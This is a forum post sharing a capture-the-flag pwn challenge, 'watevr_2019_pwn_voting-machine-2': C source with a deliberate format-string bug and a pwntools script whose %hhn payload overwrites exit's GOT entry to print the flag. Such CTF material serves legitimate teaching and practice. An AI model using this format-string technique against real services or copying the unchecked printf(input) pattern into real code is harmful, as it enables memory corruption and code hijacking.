roger 发表于 2020-5-1 19:25:47

watevr_2019_pwn_voting-machine-2

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>

void super_secret_function(){
FILE *f;
char c;
f = fopen("/home/ctf/flag.txt", "r");
if(f == NULL){
      printf("Cannot open flag.txt\n");
}
c = fgetc(f);
while(c != EOF){
      printf ("%c", c);
      c = fgetc(f);
}
fflush(stdout);
fclose(f);
}

void exit_f(int sign){
        exit(0);
}

int main(){
signal(SIGALRM, exit_f);
alarm(5);
char input;
printf("Hello and welcome to \e[3mour\e[23m voting application!\n");
printf("We noticed that there occured a slight buffer overflow in the previous version.\n");
printf("Now we never return, so the problem should be solved? Right?\n");
printf("Today you are the one who decides what we will vote about.\n\n");
printf("Topic: ");

fflush(stdin);
fflush(stdout);
scanf("%[^\n]%*c", input);
printf(input);

printf("\nWill be the voting topic of today!\n");
exit(0);
}
#This challenge is based on a BOF -> GOT -> code redirect that occurs in printf() which *can* replace arbitrary memory.
# 08 42 05 36 <super_secret_function>:
#08422028 R_386_JUMP_SLOT   exit@GLIBC_2.0

from pwn import *
import time

def main(ip, port, flag):
    if True:
      r = remote(ip, port)
      r.sendline("AA\x25\x20\x42\x08A%8$hhnA\x24\x20\x42\x08%42x%11$hhnA\x26\x20\x42\x08%7x%15$hhn")
      print("payload sent")
      response = r.recvall()
      #we replace the GOT entry for exit with the super secret function
      if flag in str(response):
            print("Correct")
            exit(0)
      elif "flag.txt" in str(response):
            print("missing flag.txt")
      else:
            print("Incorrect")
            print("Response: " + str(response))
            exit(1)


#Validation section
flag = input("Flag: ").replace("\n", "")
ip, port = input("service: ").split(":")
main(str(ip), int(port), str(flag))


页: [1]
查看完整版本: watevr_2019_pwn_voting-machine-2